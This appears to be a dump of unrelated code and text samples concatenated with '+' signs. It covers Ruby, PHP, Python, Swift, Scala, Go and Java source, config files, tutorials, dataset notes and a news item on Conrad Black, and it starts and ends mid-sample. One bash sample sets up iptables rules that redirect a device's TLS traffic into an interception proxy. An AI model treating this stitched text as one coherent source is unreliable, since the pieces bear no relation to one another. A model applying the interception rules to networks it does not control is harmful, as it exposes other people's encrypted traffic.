VersionInfo.new\n end\n end\n\n def initialize(major = 0, minor = 0, patch = 0)\n @major = major\n @minor = minor\n @patch = patch\n end\n\n def <=>(other)\n return unless other.is_a? VersionInfo\n return unless valid? && other.valid?\n\n if other.major < @major\n 1\n elsif @major < other.major\n -1\n elsif other.minor < @minor\n 1\n elsif @minor < other.minor\n -1\n elsif other.patch < @patch\n 1\n elsif @patch < other.patch\n -1\n else\n 0\n end\n end\n\n def to_s\n if valid?\n \"%d.%d.%d\" % [@major, @minor, @patch]\n else\n \"Unknown\"\n end\n end\n\n def valid?\n @major >= 0 && @minor >= 0 && @patch >= 0 && @major + @minor + @patch > 0\n end\n end\nend" +"# The objective is to build a tree object whose all branches are connected. In other words, the tree is manifold.\n# To do so, the tree is generated as a succession of modules that can represent splits, stems and so on.\n# The modules are objects from the class Module.\n# Each module has a resolution, except the modules that make the junction between two different levels of subdivision\n\n\n\n\nimport bpy, bmesh\nimport numpy as np\nfrom mathutils import Vector, Matrix\nfrom math import pi, sqrt, cos, sin\nfrom .bridge import bridge\nfrom random import random\n\n\ndef square(size):\n \"\"\"Returns a list of 4 vectors arranged in a square of specified size\"\"\"\n return [Vector((-1, -1, 0))*size, Vector((1, -1, 0))*size, Vector((1, 1, 0))*size, Vector((-1, 1, 0))*size]\n\n\ndef octagon(size):\n result = []\n for i in range(8):\n angle = pi*i/4\n result.append(Vector((cos(angle), sin(angle), 0)) * size)\n return result\n\n\ndef directions_to_spin(direction, secondary_direction):\n direction_rotation = Vector((0,0,1)).rotation_difference(direction).to_matrix()\n secondary_direction = secondary_direction * direction_rotation\n spin = - secondary_direction.xy.angle_signed(Vector((-1, 0)))\n return spin\n\n\ndef get_direction(primary_direction, angle, spin):\n rot_1 = Matrix.Rotation(angle, 4, 'Y')\n rot_2 = primary_direction.rotation_difference(Vector((0,0,1))).to_matrix()\n rot_3 = Matrix.Rotation(spin, 4, 'Z')\n direction = ((rot_1 * Vector((0, 0, 1))) * rot_3) * rot_2\n return direction\n\n\ndef average_vector(vectors):\n \"\"\"returns the average vector of a" +"<?php\n/**\n * Blog Config File\n * Common Functions for Blog and Single Blog\n *\n * @package Astra\n */\n\nif ( ! defined( 'ABSPATH' ) ) {\n\texit; // Exit if accessed directly.\n}\n\n/**\n * Common Functions for Blog and Single Blog\n *\n * @return post meta\n */\nif ( ! function_exists( 'astra_get_post_meta' ) ) {\n\n\t/**\n\t * Post meta\n\t *\n\t * @param string $post_meta Post meta.\n\t * @param string $separator Separator.\n\t * @return string post meta markup.\n\t */\n\tfunction astra_get_post_meta( $post_meta, $separator = '/' ) {\n\n\t\t$output_str = '';\n\t\t$loop_count = 1;\n\n\t\t$separator = apply_filters( 'astra_post_meta_separator', $separator );\n\n\t\tforeach ( $post_meta as $meta_value ) {\n\n\t\t\tswitch ( $meta_value ) {\n\n\t\t\t\tcase 'author':\n\t\t\t\t\t$author = get_the_author();\n\t\t\t\t\tif ( ! empty( $author ) ) {\n\t\t\t\t\t\t$output_str .= ( 1 != $loop_count && '' != $output_str ) ? ' ' . $separator . ' ' : '';\n\t\t\t\t\t\t$output_str .= esc_html( astra_default_strings( 'string-blog-meta-author-by', false ) ) . astra_post_author();\n\t\t\t\t\t}\n\t\t\t\t\tbreak;\n\n\t\t\t\tcase 'date':\n\t\t\t\t\t$output_str .= ( 1 != $loop_count && '' != $output_str ) ? ' ' . $separator . ' ' : '';\n\t\t\t\t\t$output_str .= astra_post_date();\n\t\t\t\t\tbreak;\n\n\t\t\t\tcase 'category':\n\t\t\t\t\t$category = astra_post_categories();\n\t\t\t\t\tif ( '' != $category ) {\n\t\t\t\t\t\t$output_str .= (" +"---\n.. title: Mask an image with a shape\n.. summary: How to mask an image with a shape\n.. type: howto\n---\n\nSince 0.9.0 openFrameworks has had the ability to set the alpha mask for a texture with another texture. In this example, we draw a path into an FBO (offscreen image) and then pass the result to the image we want to mask.\n\n```\nofPath path;\nofImage img;\nofFbo fbo;\n\n\nvoid setup(){\n path.lineTo(...);\n // draw on the path, level of gray means alpha\n\n fbo.allocate(w,h,GL_LUMINANCE); //or GL_RED if you are using the programmable renderer\n fbo.begin();\n path.draw();\n fbo.end();\n\n img.getTexture().setAlphaMask(fbo.getTexture());\n}\n\nvoid draw(){\n img.draw();\n}\n```" +"// Jest Snapshot v1, https://goo.gl/fbAQLP\n\nexports[`save() should change prettify format to remove spaces around = 1`] = `\nObject {\n \"/test.ini\": \"\n[foo]\nbar=xxx\n\",\n}\n`;\n\nexports[`save() should create file 1`] = `\nObject {\n \"/test.ini\": \"\n[foo]\nbar = xxx\n\",\n}\n`;\n\nexports[`save() should create file with a comment 1`] = `\nObject {\n \"/test.ini\": \"# comment\n\n[foo]\nbar = xxx\n\",\n}\n`;\n\nexports[`save() should not add spaces to file if they did not exist before 1`] = `\nObject {\n \"/test.ini\": \"\n[foo]\nbar=42\n\",\n}\n`;\n\nexports[`save() should not add spaces to file if they did not exist before, ignore comments 1`] = `\nObject {\n \"/test.ini\": \"\n[foo]\nbar=42\n\",\n}\n`;\n\nexports[`save() should update file 1`] = `\nObject {\n \"/test.ini\": \"\n[foo]\nbar = xxx\n\",\n}\n`;" +"#N canvas 94 39 629 576 10;\n#X text 430 514 (c)2011 \\, Marian Weger;\n#X obj 287 127 spigot 1;\n#X msg 287 179 \\$3 \\$2 \\$1;\n#X obj 287 80 r /midi/\\$1/in;\n#X obj 37 142 spigot 1;\n#X obj 37 80 r \\$2;\n#X obj 37 360 + 0.5;\n#X obj 37 380 int;\n#X obj 287 484 t b a b;\n#X msg 326 510 0;\n#X obj 306 537 s \\$2;\n#X msg 287 510 1;\n#X obj 37 188 spigot 1;\n#X obj 287 324 * 1;\n#X obj 287 275 / 127;\n#X obj 37 306 / 1;\n#X obj 37 328 * 127;\n#X obj 155 80 inlet out-state;\n#X obj 400 80 inlet in-state;\n#X obj 37 254 - \\$7;\n#X obj 52 282 r \\$0-scaling;\n#X obj 37 433 list append \\$4;\n#X obj 287 368 kdemux2 \\$8;\n#X obj 344 395 pack f \\$8;\n#X obj 344 423 line 0 \\$9;\n#X obj 287 253 route \\$4;\n#X obj 302 299 r \\$0-scaling;\n#X obj 287 157 route \\$3;\n#X obj 37 401 list prepend \\$3;\n#X obj 287 346 + \\$7;\n#X text 33 14 midi_bi: <domain> <name>" +"Canadian media baron Conrad Black said on Wednesday he wanted to increase his stake in Australia's oldest newspaper group, John Fairfax Holdings Ltd, to 50 percent from 25, a day after meeting the prime minister.\nHowever, Black repeated that he would sell out of Fairfax if there was no easing in Australia's current media ownership rules, which he described as \"anachronistic\".\nBlack said that although he could not rule out selling his stake to Kerry Packer, the suggested merger plan by Packer between his media empire and Fairfax was unlikely to suceed. \nBlack told shareholders at Fairfax's annual meeting that he had said to John Howard in their first meeting since Howard became prime minister that he would like to raise his stake, which is held through Hollinger International Inc.\nBlack was asked by reporters after Fairfax's meeting just how much he would want to increase his stake to, if allowed. \"Fifty percent,\" he said.\nThe media baron added that U.S. accounting rules effectively punished companies which had higher than 50 percent stakes in their associates. However, Black repeated that he would sell his Fairfax stake if he was not allowed to raise it further. \n\"If the road is truly" +"# Copyright 1999-2015 Gentoo Foundation\n# Distributed under the terms of the GNU General Public License v2\n\n# @ECLASS: java-virtuals-2.eclass\n# @MAINTAINER:\n# java@gentoo.org\n# @AUTHOR:\n# Original Author: Alistair John Bush <ali_bush@gentoo.org>\n# @BLURB: Java virtuals eclass\n# @DESCRIPTION:\n# To provide a default (and only) src_install function for ebuilds in the\n# java-virtuals category.\n\ninherit java-utils-2\n\nDEPEND=\">=dev-java/java-config-2.2.0-r3\"\nRDEPEND=\"${DEPEND}\"\n\nS=\"${WORKDIR}\"\n\nEXPORT_FUNCTIONS src_install\n\n# @FUNCTION: java-virtuals-2_src_install\n# @DESCRIPTION:\n# default src_install\n\njava-virtuals-2_src_install() {\n\tjava-virtuals-2_do_write\n}\n\n# @FUNCTION: java-pkg_do_virtuals_write\n# @INTERNAL\n# @DESCRIPTION:\n# Writes the virtual env file out to disk.\n\njava-virtuals-2_do_write() {\n\tjava-pkg_init_paths_\n\n\tdodir \"${JAVA_PKG_VIRTUALS_PATH}\"\n\t{\n\t\tif [[ -n \"${JAVA_VIRTUAL_PROVIDES}\" ]]; then\n\t\t\techo \"PROVIDERS=\\\"${JAVA_VIRTUAL_PROVIDES}\\\"\"\n\t\tfi\n\n\t\tif [[ -n \"${JAVA_VIRTUAL_VM}\" ]]; then\n\t\t\techo \"VM=\\\"${JAVA_VIRTUAL_VM}\\\"\"\n\t\tfi\n\n\t\tif [[ -n \"${JAVA_VIRTUAL_VM_CLASSPATH}\" ]]; then\n\t\t\techo \"VM_CLASSPATH=\\\"${JAVA_VIRTUAL_VM_CLASSPATH}\\\"\"\n\t\tfi\n\t\techo \"MULTI_PROVIDER=\\\"${JAVA_VIRTUAL_MULTI=FALSE}\\\"\"\n\t} > \"${JAVA_PKG_VIRTUAL_PROVIDER}\"\n}" +"//\n// TodayListView.swift\n// Gank.lu\n//\n// Created by Lei Pan on 2020/1/29.\n// Copyright \u00a9 2020 smartalker. All rights reserved.\n//\n\nimport SwiftUI\n\nstruct TodayListView: View {\n @ObservedObject var observed = BannerObserver()\n @ObservedObject var gankObserved = GankObserver()\n\n init() {\n UITableView.appearance().tableFooterView = UIView()\n UITableView.appearance().separatorStyle = .none\n self.observed.fetchBanners()\n self.gankObserved.fetchGanks()\n }\n \n var body: some View {\n List {\n ZStack(alignment: .bottomLeading) {\n if observed.banners.isEmpty {\n Text(\"loading...\").frame(maxWidth: .infinity)\n } else {\n PageView(observed.banners.map { BannerCard(url: $0.image, title: $0.title)})\n }\n }.listRowInsets(EdgeInsets())\n ForEach(gankObserved.ganks, id: \\.self) { gank in\n HStack {\n if gank.type == \"Girl\" {\n GirlView(gank: gank).frame(height: 340)\n } else {\n GankView(gank: gank).frame(height: 120)\n }\n }.padding(EdgeInsets(top: 6, leading: 16, bottom: 6, trailing: 16))\n .listRowInsets(EdgeInsets())\n }\n if !gankObserved.ganks.isEmpty {\n Rectangle()\n .fill(Color.clear).onAppear {\n self.gankObserved.fetchGanks()\n }\n }\n }\n }\n}\n\nstruct TodayListView_Previews: PreviewProvider {\n static var previews: some View {\n TodayListView()\n }\n}" +"---\nhandle: use-cases\ncanonical: https://maze.digital/webticker/use-cases/\ntitle: News Ticker, Stock Ticker & Image Ticker with jQuery Web Ticker\ndescription: A list of possible use cases of how you can use the jQuery Web Ticker, from news tickers to stock tickers, to image tickers.\n---\n\n\n##Use Cases\n\nBelow are examples of different uses for the web ticker.\n\n### Use Case 1: News Ticker {#news}\n\nNews changes fairly frequently, at times you may want to offer byte-sized headlines going across your website for your customers to knwo what is going on. The continous functionality of the WebTicker with the option to pause on hover is great to allow your users to interact with this content. Most importantly, all the items can be in themselves links, taking your users to the relevant articles.\n\n<div class=\"ticker-wrapper\">\n\t<ul id=\"news-webticker\" >\n\t\t<li data-update=\"item1\">WebTicker v3.0.0 has just been released! Read the new documentation.</li>\t\n\t\t<li data-update=\"item2\">WebTicker v3.0.0 now has commercial licenses available</li>\n\t\t<li data-update=\"item3\">News can potentially be dynamically updated and WebTicker can do just that!</li>\n\t</ul>\n</div>\n\n### Use Case 2: Stock Ticker {#finance}\n\nTick rates change and update all the time, Web Ticker is a great way to show updated pricing to your clients. Through the update facility" +"#!/usr/bin/env bash\n\n#Environment variable that corresponds to the Internet-facing switch/router.\nexport INTERNET_ROUTER_IP=\"192.168.1.1\"\n\n#Fix DNS issues\necho \"nameserver 8.8.8.8\" > /etc/resolv.conf\n\n#This is needed to supress annoying (but harmeless) error messages from apt-get.\n#Do not change this value.\nexport DEBIAN_FRONTEND=noninteractive\n\n#Route 8888 to 8080. This is used for the Trudy intercept. Remove if you do not want to use trudy.\n#/sbin/iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 8888 -m tcp -j REDIRECT --to-ports 8080\n\n#Route all $dport destined traffic through the VM's port 6443. Use this to intercept TLS traffic. Remove if you do not want to use trudy.\n#NOTE: If the device you are proxying validates TLS certificates and you do not have a valid TLS certificate\n# you will not want to do this!\n/sbin/iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 443 -m tcp -j REDIRECT --to-ports 6443\n\n#Routes all other TCP traffic (i.e. traffic that does not fall under the previous two rules) coming into the instance through port 6666 on the VM. Remove if you do not want to use trudy.\n/sbin/iptables -t nat -A PREROUTING -i eth1 -p tcp -m tcp -j REDIRECT --to-ports 6666\n\n#Setup routes. This allows the" +"import { ElementRef, Component, ViewChild, Input, ChangeDetectionStrategy } from \"@angular/core\";\n\ndeclare var jQuery: any;\n\n/**\n * Component, implementation of Semantic UI popup components.\n *\n * This component is triggered by UIPopupDirective.\n */\n@Component({\n changeDetection: ChangeDetectionStrategy.OnPush,\n selector: \"sm-popup\",\n template: `<div class=\"ui popup very wide {{class}}\" #popup>\n <div class=\"content\">\n <ng-content></ng-content>\n </div>\n</div>`\n})\nexport class SemanticPopupComponent {\n @ViewChild(\"popup\") popup: ElementRef;\n @Input() class: string;\n\n private visible: boolean = false;\n private element: Element;\n\n show(element: Event, data: {} = {}) {\n\n if (!this.visible) {\n\n this.visible = true;\n this.element = <Element>element.target;\n\n const options: {} = Object.assign({\n closable: true,\n exclusive: true,\n lastResort: true,\n on: \"click\",\n onHide: () => this.hide(),\n popup: this.popup.nativeElement,\n position: \"bottom center\",\n preserve: true,\n }, data);\n\n jQuery(this.element)\n .popup(options)\n .popup(\"show\");\n }\n }\n\n hide() {\n if (this.visible && this.element) {\n\n this.visible = false;\n\n jQuery(this.element)\n .popup(\"hide\");\n }\n }\n}" +"#' @importFrom R6 R6Class\n#' @importFrom scales comma\n#' @importFrom ggplot2 scale_color_continuous\nChoropleth = R6Class(\"Choropleth\", \n \n public = list(\n # the key objects for this class\n user.df = NULL, # input from user\n map.df = NULL, # geometry of the map\n choropleth.df = NULL, # result of binding user data with our map data\n \n title = \"\", # title for map\n legend = \"\", # title for legend\n warn = TRUE, # warn user on clipped or missing values \n ggplot_scale = NULL, # override default scale.\n # warning, you need to set \"drop=FALSE\" for insets to render correctly\n \n # a choropleth map is defined by these two variables\n # a data.frame of a map\n # a data.frame that expresses values for regions of each map\n initialize = function(map.df, user.df)\n {\n stopifnot(is.data.frame(map.df))\n stopifnot(\"region\" %in% colnames(map.df))\n self$map.df = map.df\n \n # all input, regardless of map, is just a bunch of (region, value) pairs\n stopifnot(is.data.frame(user.df))\n stopifnot(c(\"region\", \"value\") %in% colnames(user.df))\n self$user.df = user.df\n self$user.df = self$user.df[, c(\"region\", \"value\")]\n \n stopifnot(anyDuplicated(self$user.df$region) == 0)\n \n # things like insets won't color properly if they are characters, and not factors\n if (is.character(self$user.df$value))\n {\n self$user.df$value = as.factor(self$user.df$value)\n }\n \n # initialize the map to the max zoom - i.e. all regions\n self$set_zoom(NULL)" +"#ifndef __XEN_SHARED_H__\n#define __XEN_SHARED_H__\n\n#ifdef CONFIG_COMPAT\n\n#include <compat/xen.h>\n\ntypedef union {\n struct shared_info native;\n struct compat_shared_info compat;\n} shared_info_t;\n\n/*\n * Compat field is never larger than native field, so cast to that as it\n * is the largest memory range it is safe for the caller to modify without\n * further discrimination between compat and native cases.\n */\n#define __shared_info(d, s, field) \\\n (*(!has_32bit_shinfo(d) ? \\\n (typeof(&(s)->compat.field))&(s)->native.field : \\\n &(s)->compat.field))\n\ntypedef union {\n struct vcpu_info native;\n struct compat_vcpu_info compat;\n} vcpu_info_t;\n\n/* As above, cast to compat field type. */\n#define __vcpu_info(v, i, field) \\\n (*(!has_32bit_shinfo((v)->domain) ? \\\n (typeof(&(i)->compat.field))&(i)->native.field : \\\n &(i)->compat.field))\n\n#else\n\ntypedef struct shared_info shared_info_t;\n#define __shared_info(d, s, field) ((s)->field)\n\ntypedef struct vcpu_info vcpu_info_t;\n#define __vcpu_info(v, i, field) ((i)->field)\n\n#endif\n\nextern vcpu_info_t dummy_vcpu_info;\n\n#define shared_info(d, field) __shared_info(d, (d)->shared_info, field)\n#define vcpu_info(v, field) __vcpu_info(v, (v)->vcpu_info, field)\n\n#endif /* __XEN_SHARED_H__ */" +"#!/bin/sh\n#\n# http://github.com/mitchweaver/bin\n#\n# \u2590 \u258c \u2597 \u2597\u2580\u2596 \n# \u258c \u258c\u259c\u2580 \u258c\u2597\u2598\u259b\u2580\u2596\u2584 \u2590 \u259e\u2580\u2596\n# \u259a\u2584\u258c\u2590 \u2596\u259b\u259a \u258c \u258c\u2590 \u259c\u2580 \u259b\u2580 \n# \u2597\u2584\u2598 \u2580 \u2598 \u2598\u2598 \u2598\u2580\u2598\u2590 \u259d\u2580\u2598\n#\n# youtube-dl swiss army knife\n#\n# Originally written to view tags of youtube videos,\n# it will grow in features eventually as needs arise.\n#\n\ndie() { >&2 printf 'Error: %s\\n' \"$*\" ; exit 1 ; }\n\nusage() {\n>&2 cat <<EOF\n$(head -n 10 \"$0\" | tail -n 6)\n\nUsage:\n\n[-c] category\n[-d] upload date\n[-i] video id\n[-l] length\n[-n] thumbnail url\n[-s] description\n[-t] title\n[-u] user\n[-g] tags\n\nEOF\n}\n\ndumpinfo() {\n youtube-dl -q --no-warnings -j --no-playlist --skip-download \"$1\"\n}\n\nmain() {\n command -v jq >/dev/null || die 'Missing dependency: jq'\n\n case $# in\n 1)\n case $1 in\n h|-h|*help) ;;\n *) die 'Not enough arguments.'\n esac\n esac\n\n while [ \"$1\" ] ; do\n case ${1#-} in\n h|*help) usage ;;\n dump) dumpinfo \"$2\" ; exit ;;\n c) dumpinfo \"$2\" | jq -r '.categories[]' ; shift ;;\n d) dumpinfo \"$2\" | jq -r '.upload_date' ; shift ;;\n i) dumpinfo \"$2\" | jq -r '.id' ; shift ;;\n l) dumpinfo \"$2\" | jq -r '.duration' ; shift" +"---\nlang: PT-BR\ntitle: Sum\u00e1rio #6 Que Significa Que Voc\u00ea Foi Bem Longe\nanswer: \\{\\}\nclass: stretcher chapmark\nok: Ok, \u00e9 um Hash vazio\nerror: \n---\n\nVoc\u00ea \u00e9 um cl\u00e9rigo Ruby level 6. Quero dizer, que grande trabalho voc\u00ea fez. Vamos revisar:\n\n### Dados\nVoc\u00ea carregou alguns dados da internet,\n\n### Iterando\nVoc\u00ea iterou todos os elementos de um hash e voc\u00ea encadeou alguns outros m\u00e9todos.\n\n### Imprimindo Bonito\nE como se isso n\u00e3o fosse o bastante, voc\u00ea formatou e imprimiu alguns valores de uma forma\nque \u00e9 f\u00e1cil para humanos ler. De fato, __voc\u00ea fez um programa real!__\n\n### IF\nVoc\u00ea aprendeu a tomar o controle dos seus programas com declara\u00e7\u00f5es de __if__ e __else__.\n\n## Ent\u00e3o\nO que \u00e9 poss\u00edvel fazer em seguida? O que \u00e9 poss\u00edvel que voc\u00ea ainda tenha que aprender agora?\nHa! Esta \u00e9 a melhor parte. Voc\u00ea percorreu um caminho t\u00e3o grande que agora vamos revelar as classes.\nApenas mais duas li\u00e7\u00f5es curtas, e acabou.\n\nMais cedo, n\u00f3s criamos um Hash desta forma:\n\n Hash.new" +"// SPDX-License-Identifier: Apache-2.0\n\npackage firrtl.passes\npackage clocklist\n\nimport firrtl._\nimport firrtl.ir._\nimport wiring.Lineage\nimport Utils._\nimport memlib.AnalysisUtils._\n\nobject ClockListUtils {\n\n /** Returns a list of clock outputs from instances of external modules\n */\n def getSourceList(moduleMap: Map[String, DefModule])(lin: Lineage): Seq[String] = {\n val s = lin.foldLeft(Seq[String]()) {\n case (sL, (i, l)) =>\n val sLx = getSourceList(moduleMap)(l)\n val sLxx = sLx.map(i + \"$\" + _)\n sL ++ sLxx\n }\n val sourceList = moduleMap(lin.name) match {\n case ExtModule(i, n, ports, dn, p) =>\n val portExps = ports.flatMap { p => create_exps(WRef(p.name, p.tpe, PortKind, to_flow(p.direction))) }\n portExps.filter(e => (e.tpe == ClockType) && (flow(e) == SinkFlow)).map(_.serialize)\n case _ => Nil\n }\n val sx = sourceList ++ s\n sx\n }\n\n /** Returns a map from instance name to its clock origin.\n * Child instances are not included if they share the same clock as their parent\n */\n def getOrigins(\n connects: Connects,\n me: String,\n moduleMap: Map[String, DefModule]\n )(lin: Lineage\n ): Map[String, String] = {\n val sep = if (me == \"\") \"\" else \"$\"\n // Get origins from all children\n val childrenOrigins = lin.foldLeft(Map[String, String]()) {\n case (o, (i, l)) =>\n o ++ getOrigins(connects, me + sep + i, moduleMap)(l)\n }\n // If I have a clock," +"import { Injectable } from '@angular/core';\n\nimport { Subject } from 'rxjs';\n\nimport { NotifierAction } from '../models/notifier-action.model';\n\n/**\n * Notifier queue service\n *\n * In general, API calls don't get processed right away. Instead, we have to queue them up in order to prevent simultanious API calls\n * interfering with each other. This, at least in theory, is possible at any time. In particular, animations - which potentially overlap -\n * can cause changes in JS classes as well as affect the DOM. Therefore, the queue service takes all actions, puts them in a queue, and\n * processes them at the right time (which is when the previous action has been processed successfully).\n *\n * Technical sidenote:\n * An action looks pretty similar to the ones within the Flux / Redux pattern.\n */\n@Injectable()\nexport class NotifierQueueService {\n\n\t/**\n\t * Stream of actions, subscribable from outside\n\t */\n\tpublic readonly actionStream: Subject<NotifierAction>;\n\n\t/**\n\t * Queue of actions\n\t */\n\tprivate actionQueue: Array<NotifierAction>;\n\n\t/**\n\t * Flag, true if some action is currently in progress\n\t */\n\tprivate isActionInProgress: boolean;\n\n\t/**\n\t * Constructor\n\t */\n\tpublic constructor() {\n\t\tthis.actionStream = new Subject<NotifierAction>();\n\t\tthis.actionQueue = [];\n\t\tthis.isActionInProgress = false;\n\t}\n\n\t/**\n\t * Push a new action" +"# absolute root path of your azerothcore repository\n# It should not be modified if you don't really know what you're doing\nSRCPATH=\"$AC_PATH_ROOT\"\n\n# absolute path where build files must be stored\nBUILDPATH=\"$AC_PATH_ROOT/var/build/obj\"\n\n# absolute path where binary files must be stored\nBINPATH=\"$AC_PATH_ROOT/env/dist\"\n\n# bash fills it by default with your os type. No need to change it.\n# Change it if you really know what you're doing.\n# OSTYPE=\"\"\n\n# When using linux, our installer automatically get information about your distro\n# using lsb_release. If your distro is not supported but it's based on ubuntu or debian,\n# please change it to one of these values.\n#OSDISTRO=\"ubuntu\"\n\n# absolute path where config. files must be stored\n# default: the system will use binpath by default\n# CONFDIR=\"$AC_PATH_ROOT/env/dist/etc/\"\n\n##############################################\n#\n# COMPILER_CONFIGURATIONS\n#\n##############################################\n\n\n# Set preferred compilers.\n# To use gcc (not suggested) instead of clang change in:\n# CCOMPILERC=\"/usr/bin/gcc\"\n# CCOMPILERCXX=\"/usr/bin/g++\"\n#\nCCOMPILERC=\"/usr/bin/clang\"\nCCOMPILERCXX=\"/usr/bin/clang++\"\n\n\n# how many thread must be used for compilation ( leave zero to use all available )\nMTHREADS=0\n# enable/disable warnings during compilation\nCWARNINGS=ON\n# enable/disable some debug informations ( it's not a debug compilation )\nCDEBUG=OFF\n# specify compilation type\nCTYPE=Release\n# compile" +"\ufeff---\nauthor: Stefan-Stojanovic\n\ntype: normal\n\ncategory: how to\n\nlinks:\n - '[CEILING](https://support.google.com/docs/answer/3093471){documentation}'\n\n---\n\n# CEILING\n\n---\n## Content\n\nThe `=CEILING()` function is used to round a number up to a specified integer or decimal place.\n\nThe syntax is:\n```plain-tex\n=CEILING(value, factor)\n```\n\nThe `value` is what we want to round down. You can manually input a number or select a cell.\n\nThe `factor` value is optional. It determines up to what decimal the `value` is rounded up. \n\n> \ud83d\udca1 The `factor` value is `1` by default and can never be `0`.\n\nWhen the `value` is positive, the `factor` must be positive. \n\nWhen the `value` is negative, the `factor` can be either positive or negative.\n\n![ceiling](https://img.enkipro.com/3ad58926a0e4b72d6897e9fa009f6345.png)\n\n---\n## Practice\n\nThe ??? function is used to round a number ??? to a specified integer or decimal place.\n\n* CEILING()\n* up\n* FLOOR()\n* down\n\n---\n## Revision\n\nWhat would the output of this function be?\n\n```plain-text\n=CEILING(19.89)\n```\n\n???\n\n- 20\n- 19\n- 21\n- 19.9" +"ABIDE\n\n\nNotes\n-----\nThe Autism Brain Imaging Data Exchange (ABIDE) dataset provides previously\ncollected resting state functional magnetic resonance imaging datasets\nfrom 539 individuals with ASD and 573 typical controls for the purpose\nof data sharing in the broader scientific community. This grass-root\ninitiative involved 16 international sites, sharing 20 samples yielding\n1112 datasets composed of both MRI data and an extensive array of\nphenotypic information common across nearly all sites (see below).\n\nNote that this is the preprocessed version of ABIDE provided by the\npreprocess connectome projects (PCP).\n\n\nContent\n-------\n :'phenotypic': Behavioral information.\n\n\nReferences\n----------\n\nFor more information about this dataset's structure:\nhttp://preprocessed-connectomes-project.github.io\nhttp://www.childmind.org/en/healthy-brain-network/abide/\n\nNielsen, Jared A., et al. \"Multisite functional connectivity MRI\nclassification of autism: ABIDE results.\" Frontiers in human neuroscience\n7 (2013).\n\nLicence: Consistent with the policies of the 1000 Functional Connectomes\nProject, data usage is unrestricted for non-commercial research purposes." +"// +build go1.7\n\npackage csm\n\nimport \"testing\"\n\nfunc TestAddressWithDefaults(t *testing.T) {\n\tcases := map[string]struct {\n\t\tHost, Port string\n\t\tExpect string\n\t}{\n\t\t\"ip\": {\n\t\t\tHost: \"127.0.0.2\", Port: \"\", Expect: \"127.0.0.2:31000\",\n\t\t},\n\t\t\"localhost\": {\n\t\t\tHost: \"localhost\", Port: \"\", Expect: \"127.0.0.1:31000\",\n\t\t},\n\t\t\"uppercase localhost\": {\n\t\t\tHost: \"LOCALHOST\", Port: \"\", Expect: \"127.0.0.1:31000\",\n\t\t},\n\t\t\"port\": {\n\t\t\tHost: \"localhost\", Port: \"32000\", Expect: \"127.0.0.1:32000\",\n\t\t},\n\t\t\"ip6\": {\n\t\t\tHost: \"::1\", Port: \"\", Expect: \"[::1]:31000\",\n\t\t},\n\t\t\"unset\": {\n\t\t\tHost: \"\", Port: \"\", Expect: \"127.0.0.1:31000\",\n\t\t},\n\t}\n\n\tfor name, c := range cases {\n\t\tt.Run(name, func(t *testing.T) {\n\t\t\tactual := AddressWithDefaults(c.Host, c.Port)\n\t\t\tif e, a := c.Expect, actual; e != a {\n\t\t\t\tt.Errorf(\"expect %v, got %v\", e, a)\n\t\t\t}\n\t\t})\n\t}\n}" +"using System.IO;\nusing System.Runtime.Serialization;\nusing OrigoDB.Core.Utilities;\n\nnamespace OrigoDB.Core\n{\n /// <summary>\n /// Decorator transforming graph to packet\n /// </summary>\n public class PacketingFormatter : IFormatter\n {\n readonly PacketOptions _options;\n readonly IFormatter _decoratedFormatter;\n\n\n public PacketingFormatter(IFormatter decoratedFormatter, PacketOptions options)\n {\n Ensure.NotNull(decoratedFormatter, \"decoratedFormatter\");\n _decoratedFormatter = decoratedFormatter;\n _options = options;\n }\n\n public void Serialize(Stream stream, object graph)\n {\n MemoryStream ms = new MemoryStream();\n _decoratedFormatter.Serialize(ms, graph);\n Packet packet = Packet.Create(ms.ToArray(), _options);\n packet.Write(stream);\n }\n\n public object Deserialize(Stream stream)\n {\n var packet = Packet.Read(stream);\n return _decoratedFormatter.Deserialize(new MemoryStream(packet.Bytes));\n }\n\n public SerializationBinder Binder\n {\n get { return _decoratedFormatter.Binder; }\n set { _decoratedFormatter.Binder = value; }\n }\n\n public StreamingContext Context\n {\n get { return _decoratedFormatter.Context; }\n set { _decoratedFormatter.Context = value; }\n }\n\n\n public ISurrogateSelector SurrogateSelector\n {\n get { return _decoratedFormatter.SurrogateSelector; }\n set { _decoratedFormatter.SurrogateSelector = value; }\n }\n }\n}" +"// Copyright 1998-2017 Epic Games, Inc. All Rights Reserved.\n\n#pragma once\n\n#include \"CoreMinimal.h\"\n#include \"ISourceControlProvider.h\"\n\nnamespace SourceControlAutomationCommon\n{\n\t/**\n\t* Helper class for receiving the results of async source control operations\n\t*/\n\tclass FAsyncCommandHelper\n\t{\n\tpublic:\n\t\tFAsyncCommandHelper(const FString& InParameter = FString())\n\t\t\t: Parameter(InParameter)\n\t\t\t, bDispatched(false)\n\t\t\t, bDone(false)\n\t\t\t, bSuccessful(false)\n\t\t{\n\t\t}\n\n\t\tvoid SourceControlOperationComplete(const FSourceControlOperationRef& Operation, ECommandResult::Type InResult)\n\t\t{\n\t\t\tbDone = true;\n\t\t\tbSuccessful = InResult == ECommandResult::Succeeded;\n\t\t}\n\n\t\tconst FString& GetParameter() const\n\t\t{\n\t\t\treturn Parameter;\n\t\t}\n\n\t\tbool IsDispatched() const\n\t\t{\n\t\t\treturn bDispatched;\n\t\t}\n\n\t\tvoid SetDispatched()\n\t\t{\n\t\t\tbDispatched = true;\n\t\t}\n\n\t\tbool IsDone() const\n\t\t{\n\t\t\treturn bDone;\n\t\t}\n\n\t\tbool IsSuccessful() const\n\t\t{\n\t\t\treturn bSuccessful;\n\t\t}\n\n\tprivate:\n\t\t/** Parameter we perform this operation with, if any */\n\t\tFString Parameter;\n\n\t\t/** Whether the async operation been issued */\n\t\tbool bDispatched;\n\n\t\t/** Whether the async operation has completed */\n\t\tbool bDone;\n\n\t\t/** Whether the operation was successful */\n\t\tbool bSuccessful;\n\t};\n}" +"package software.amazon.jsii.api;\n\n/**\n * Represents an override.\n */\npublic class JsiiOverride {\n /**\n * The name of the overridden method (or null if this is property override).\n */\n private String method;\n\n /**\n * The name of the overridden property (or null if this is a method override).\n */\n private String property;\n\n /**\n * The cookie.\n */\n private String cookie;\n\n /**\n * @return The name of the overridden method (or null if this is property).\n */\n public String getMethod() {\n return method;\n }\n\n /**\n * @param method The name of the overridden method (or null if this is property).\n */\n public void setMethod(final String method) {\n this.method = method;\n }\n\n /**\n * @return The name of the overridden property (or null if this is a method override).\n */\n public String getProperty() {\n return property;\n }\n\n /**\n * @param property The name of the overridden property (or null if this is a method override).\n */\n public void setProperty(final String property) {\n this.property = property;\n 